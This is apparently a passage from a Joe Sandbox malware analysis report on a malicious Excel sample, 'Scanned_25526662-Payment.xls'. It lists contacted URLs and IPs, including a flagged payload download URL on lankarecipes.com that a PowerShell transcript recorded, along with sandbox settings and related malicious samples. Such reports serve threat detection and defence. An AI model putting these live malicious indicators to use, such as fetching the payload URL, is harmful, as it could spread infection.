      https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
      https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
      https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
      https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
      https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
      https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
      https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
      https://officeci.azurewebsites.net/api/0%VirustotalBrowse
      https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
      https://store.office.cn/addinstemplate0%URL Reputationsafe
      https://store.office.cn/addinstemplate0%URL Reputationsafe
      https://store.office.cn/addinstemplate0%URL Reputationsafe
      https://store.office.cn/addinstemplate0%URL Reputationsafe
      https://wus2-000.pagecontentsync.0%URL Reputationsafe
      https://wus2-000.pagecontentsync.0%URL Reputationsafe
      https://wus2-000.pagecontentsync.0%URL Reputationsafe
      https://wus2-000.pagecontentsync.0%URL Reputationsafe
      https://store.officeppe.com/addinstemplate0%URL Reputationsafe
      https://store.officeppe.com/addinstemplate0%URL Reputationsafe
      https://store.officeppe.com/addinstemplate0%URL Reputationsafe
      https://store.officeppe.com/addinstemplate0%URL Reputationsafe
      https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
      https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
      https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
      https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
      https://www.odwebp.svc.ms0%URL Reputationsafe
      https://www.odwebp.svc.ms0%URL Reputationsafe
      https://www.odwebp.svc.ms0%URL Reputationsafe
      https://www.odwebp.svc.ms0%URL Reputationsafe
      https://dataservice.o365filtering.com/0%URL Reputationsafe
      https://dataservice.o365filtering.com/0%URL Reputationsafe
      https://dataservice.o365filtering.com/0%URL Reputationsafe
      https://dataservice.o365filtering.com/0%URL Reputationsafe
      https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
      https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
      https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
      https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
      https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
      https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
      https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
      https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
      https://apis.live.net/v5.0/0%URL Reputationsafe
      https://apis.live.net/v5.0/0%URL Reputationsafe
      https://apis.live.net/v5.0/0%URL Reputationsafe
      https://apis.live.net/v5.0/0%URL Reputationsafe
      https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
      http://lankarecipes.com/Sparc.jpg0%Avira URL Cloudsafe
      https://ncus-000.contentsync.0%URL Reputationsafe
      https://ncus-000.contentsync.0%URL Reputationsafe
      https://ncus-000.contentsync.0%URL Reputationsafe
      https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
      https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
      https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
      https://skyapi.live.net/Activity/0%URL Reputationsafe
      https://skyapi.live.net/Activity/0%URL Reputationsafe
      https://skyapi.live.net/Activity/0%URL Reputationsafe
      https://dataservice.o365filtering.com0%URL Reputationsafe
      https://dataservice.o365filtering.com0%URL Reputationsafe
      https://dataservice.o365filtering.com0%URL Reputationsafe
      https://api.cortana.ai0%Avira URL Cloudsafe
      https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      lankarecipes.com
      		192.185.236.165
      		truetrueunknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://lankarecipes.com/Sparc.jpgfalse
      • Avira URL Cloud: safe
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://api.diagnosticssdf.office.com6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
        		high
        https://login.microsoftonline.com/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
          		high
          https://shell.suite.office.com:14436F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
            		high
            https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
              		high
              https://autodiscover-s.outlook.com/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                		high
                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                  		high
                  https://cdn.entity.6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  https://api.addins.omex.office.net/appinfo/query6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                    		high
                    https://wus2-000.contentsync.6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://clients.config.office.net/user/v1.0/tenantassociationkey6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                      		high
                      https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                        		high
                        http://lankarecipes.com/Sparc.jpPowerShell_transcript.648351.+jaH7BR7.20210108094000.txt.3.drtrue
                        • Avira URL Cloud: safe
                        		unknown
                        https://powerlift.acompli.net6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://rpsticket.partnerservices.getmicrosoftkey.com6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://lookup.onenote.com/lookup/geolocation/v16F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                          		high
                          https://cortana.ai6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                            		high
                            https://cloudfiles.onenote.com/upload.aspx6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                              		high
                              https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                		high
                                https://entitlement.diagnosticssdf.office.com6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                  		high
                                  https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                    		high
                                    https://api.aadrm.com/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    https://ofcrecsvcapi-int.azurewebsites.net/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                    • 0%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                      		high
                                      https://api.microsoftstream.com/api/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                        		high
                                        https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                          		high
                                          https://cr.office.com6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                            		high
                                            https://portal.office.com/account/?ref=ClientMeControl6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                              		high
                                              https://ecs.office.com/config/v2/Office6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                		high
                                                https://graph.ppe.windows.net6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                  		high
                                                  https://res.getmicrosoftkey.com/api/redemptionevents6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://powerlift-frontdesk.acompli.net6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://tasks.office.com6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                    		high
                                                    https://officeci.azurewebsites.net/api/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                    • 0%, Virustotal, Browse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://sr.outlook.office.net/ws/speech/recognize/assistant/work6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                      		high
                                                      https://store.office.cn/addinstemplate6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://wus2-000.pagecontentsync.6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://outlook.office.com/autosuggest/api/v1/init?cvid=6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                        		high
                                                        https://globaldisco.crm.dynamics.com6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                          		high
                                                          https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                            		high
                                                            https://store.officeppe.com/addinstemplate6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://dev0-api.acompli.net/autodetect6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://www.odwebp.svc.ms6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://api.powerbi.com/v1.0/myorg/groups6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                              		high
                                                              https://web.microsoftstream.com/video/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                		high
                                                                https://graph.windows.net6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                  		high
                                                                  https://dataservice.o365filtering.com/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://officesetup.getmicrosoftkey.com6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://analysis.windows.net/powerbi/api6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                    		high
                                                                    https://prod-global-autodetect.acompli.net/autodetect6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://outlook.office365.com/autodiscover/autodiscover.json6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                      		high
                                                                      https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                        		high
                                                                        https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                          		high
                                                                          https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                            		high
                                                                            https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                              		high
                                                                              https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                		high
                                                                                http://weather.service.msn.com/data.aspx6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                  		high
                                                                                  https://apis.live.net/v5.0/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                    		high
                                                                                    https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                      		high
                                                                                      https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                        		high
                                                                                        https://management.azure.com6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                          		high
                                                                                          https://incidents.diagnostics.office.com6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                            		high
                                                                                            https://clients.config.office.net/user/v1.0/ios6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                              		high
                                                                                              https://insertmedia.bing.office.net/odc/insertmedia6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                		high
                                                                                                https://o365auditrealtimeingestion.manage.office.com6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                  		high
                                                                                                  https://outlook.office365.com/api/v1.0/me/Activities6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                    		high
                                                                                                    https://api.office.net6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                      		high
                                                                                                      https://incidents.diagnosticssdf.office.com6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                        		high
                                                                                                        https://asgsmsproxyapi.azurewebsites.net/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://clients.config.office.net/user/v1.0/android/policies6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                          		high
                                                                                                          https://entitlement.diagnostics.office.com6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                            		high
                                                                                                            https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                              		high
                                                                                                              https://outlook.office.com/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                		high
                                                                                                                https://curl.haxx.se/docs/http-cookies.htmlTest3.jpg, Test3.jpg, 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://storage.live.com/clientlogs/uploadlocation6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                    		high
                                                                                                                    https://templatelogging.office.com/client/log6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                      		high
                                                                                                                      https://outlook.office365.com/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                        		high
                                                                                                                        https://webshell.suite.office.com6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                          		high
                                                                                                                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                            		high
                                                                                                                            https://management.azure.com/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                              		high
                                                                                                                              https://ncus-000.contentsync.6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              https://login.windows.net/common/oauth2/authorize6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                		high
                                                                                                                                https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                https://graph.windows.net/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                  		high
                                                                                                                                  https://api.powerbi.com/beta/myorg/imports6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                    		high
                                                                                                                                    https://devnull.onenote.com6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                      		high
                                                                                                                                      https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                        		high
                                                                                                                                        https://messaging.office.com/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                          		high
                                                                                                                                          https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                            		high
                                                                                                                                            https://contentstorage.omex.office.net/addinclassifier/officeentities6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                              		high
                                                                                                                                              https://augloop.office.com/v26F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                                		high
                                                                                                                                                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://skyapi.live.net/Activity/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  		unknown
                                                                                                                                                  https://clients.config.office.net/user/v1.0/mac6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://dataservice.o365filtering.com6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    		unknown
                                                                                                                                                    https://api.cortana.ai6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    		unknown
                                                                                                                                                    https://onedrive.live.com6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://ovisualuiapp.azurewebsites.net/pbiagave/6F929868-7C3F-4808-A89F-5BECCA241772.0.drfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      		unknown

                                                                                                                                                      Contacted IPs

                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                      Public

                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                      45.15.143.216
                                                                                                                                                      		unknownLatvia
                                                                                                                                                      		35913DEDIPATH-LLCUSfalse
                                                                                                                                                      192.185.236.165
                                                                                                                                                      		unknownUnited States
                                                                                                                                                      		46606UNIFIEDLAYER-AS-1UStrue

                                                                                                                                                      General Information

                                                                                                                                                      Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                                      Analysis ID:337288
                                                                                                                                                      Start date:08.01.2021
                                                                                                                                                      Start time:09:35:32
                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                      Overall analysis duration:0h 8m 47s
                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                      Report type:light
                                                                                                                                                      Sample file name:Scanned_25526662-Payment.xls
                                                                                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                      Run name:Potential for more IOCs and behavior
                                                                                                                                                      Number of analysed new started processes analysed:35
                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                      Technologies:
                                                                                                                                                      • HCA enabled
                                                                                                                                                      • EGA enabled
                                                                                                                                                      • HDC enabled
                                                                                                                                                      • AMSI enabled
                                                                                                                                                      Analysis Mode:default
                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                      Detection:MAL
                                                                                                                                                      Classification:mal100.troj.expl.evad.winXLS@19/22@1/2
                                                                                                                                                      EGA Information:Failed
                                                                                                                                                      HDC Information:
                                                                                                                                                      • Successful, ratio: 76.2% (good quality ratio 44.6%)
                                                                                                                                                      • Quality average: 49.4%
                                                                                                                                                      • Quality standard deviation: 44.8%
                                                                                                                                                      HCA Information:Failed
                                                                                                                                                      Cookbook Comments:
                                                                                                                                                      • Adjust boot time
                                                                                                                                                      • Enable AMSI
                                                                                                                                                      • Found application associated with file extension: .xls
                                                                                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                      • Attach to Office via COM
                                                                                                                                                      • Scroll down
                                                                                                                                                      • Close Viewer
                                                                                                                                                      Warnings:
                                                                                                                                                      Show All
                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, conhost.exe, SgrmBroker.exe, svchost.exe
                                                                                                                                                      • TCP Packets have been reduced to 100
                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 168.61.161.212, 104.42.151.234, 52.109.32.63, 52.109.8.22, 52.109.12.21, 104.43.139.144, 104.79.90.110, 13.107.5.88, 13.107.42.23, 51.104.139.180, 8.253.145.105, 8.248.117.254, 8.248.149.254, 8.253.207.121, 8.253.145.120, 92.122.213.194, 92.122.213.247, 20.54.26.129
                                                                                                                                                      • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, client-office365-tas.msedge.net, ocos-office365-s2s.msedge.net, arc.msn.com.nsatc.net, config.edge.skype.com.trafficmanager.net, e-0009.e-msedge.net, config-edge-skype.l-0014.l-msedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, l-0014.config.skype.com, a1449.dscg2.akamai.net, arc.msn.com, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, officeclient.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, config.edge.skype.com, au-bg-shim.trafficmanager.net, fs.microsoft.com, afdo-tas-offload.trafficmanager.net, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, ocos-office365-s2s-msedge-net.e-0009.e-msedge.net, ris.api.iris.microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, l-0014.l-msedge.net, skypedataprdcolwus16.cloudapp.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                      Simulations

                                                                                                                                                      Behavior and APIs

                                                                                                                                                      TimeTypeDescription
                                                                                                                                                      09:40:19API Interceptor35x Sleep call for process: powershell.exe modified
                                                                                                                                                      09:40:45API Interceptor1x Sleep call for process: WMIC.exe modified
                                                                                                                                                      09:41:00API Interceptor539x Sleep call for process: Test3.jpg modified

                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                      IPs

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      192.185.236.165Telex06012020.xlsGet hashmaliciousBrowse
                                                                                                                                                      • lankarecipes.com/mages.jpg

                                                                                                                                                      Domains

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      lankarecipes.comTelex06012020.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.236.165

                                                                                                                                                      ASN

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      DEDIPATH-LLCUSX8yhUJB4xd.exeGet hashmaliciousBrowse
                                                                                                                                                      • 45.15.143.234
                                                                                                                                                      SecuriteInfo.com.Trojan.Siggen11.57077.29929.exeGet hashmaliciousBrowse
                                                                                                                                                      • 45.15.143.195
                                                                                                                                                      vJHWQgfJ23.exeGet hashmaliciousBrowse
                                                                                                                                                      • 45.12.110.193
                                                                                                                                                      Pago Fecha 2021.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 45.81.7.81
                                                                                                                                                      #U00d6deme.exeGet hashmaliciousBrowse
                                                                                                                                                      • 193.239.147.22
                                                                                                                                                      remittance for the month of Dec.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 45.15.143.142
                                                                                                                                                      SecuriteInfo.com.Generic.mg.5188c198e093757a.exeGet hashmaliciousBrowse
                                                                                                                                                      • 45.15.143.142
                                                                                                                                                      PICTURE SLIDE.exeGet hashmaliciousBrowse
                                                                                                                                                      • 193.239.147.22
                                                                                                                                                      New Import and Export Regulation.xlsxGet hashmaliciousBrowse
                                                                                                                                                      • 161.8.142.134
                                                                                                                                                      fdwv4hWF1M.exeGet hashmaliciousBrowse
                                                                                                                                                      • 213.59.119.203
                                                                                                                                                      svchost.exeGet hashmaliciousBrowse
                                                                                                                                                      • 161.8.142.134
                                                                                                                                                      jEgLNI40Ro9O775.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.196.0.243
                                                                                                                                                      Gxuerxdose.exeGet hashmaliciousBrowse
                                                                                                                                                      • 193.239.147.32
                                                                                                                                                      x472st8RLb.exeGet hashmaliciousBrowse
                                                                                                                                                      • 193.239.147.32
                                                                                                                                                      FmhsHF4JR9.exeGet hashmaliciousBrowse
                                                                                                                                                      • 45.15.143.142
                                                                                                                                                      BxEz8S5iu3.exeGet hashmaliciousBrowse
                                                                                                                                                      • 193.239.147.211
                                                                                                                                                      nocryt.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 193.239.147.76
                                                                                                                                                      inter.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 193.239.147.76
                                                                                                                                                      nocryt.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 193.239.147.76
                                                                                                                                                      inter.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 193.239.147.76
                                                                                                                                                      UNIFIEDLAYER-AS-1USTelex06012020.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.236.165
                                                                                                                                                      ul9kpUwYel.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.194.191
                                                                                                                                                      ______.docGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.151.24
                                                                                                                                                      ______.docGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.151.24
                                                                                                                                                      http://0620218.unfreezegrowers.com/bGVhaC5oZWl0bmVyQGV4cC5jb20=Get hashmaliciousBrowse
                                                                                                                                                      • 162.241.175.181
                                                                                                                                                      http://landerer.wellwayssaustralia.com/r/?id=kl522318,Z185223,I521823&rd=www.electriccollisionrepair.com/236:52%20PMt75252n2021?e=#landerer@doriltoncapital.comGet hashmaliciousBrowse
                                                                                                                                                      • 50.87.150.0
                                                                                                                                                      https://1drv.ms/u/s!AmqlOnt-7_dxdENKsoSwOCjxG_Q?e=3ZrXeGGet hashmaliciousBrowse
                                                                                                                                                      • 162.241.127.190
                                                                                                                                                      https://cypressbayhockey.com/NOGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.120.89
                                                                                                                                                      https://pdfsharedmessage.xtensio.com/7wtcdltaGet hashmaliciousBrowse
                                                                                                                                                      • 108.179.246.23
                                                                                                                                                      form.docGet hashmaliciousBrowse
                                                                                                                                                      • 162.241.148.243
                                                                                                                                                      RFQPO90865802ICONME.exeGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.131.105
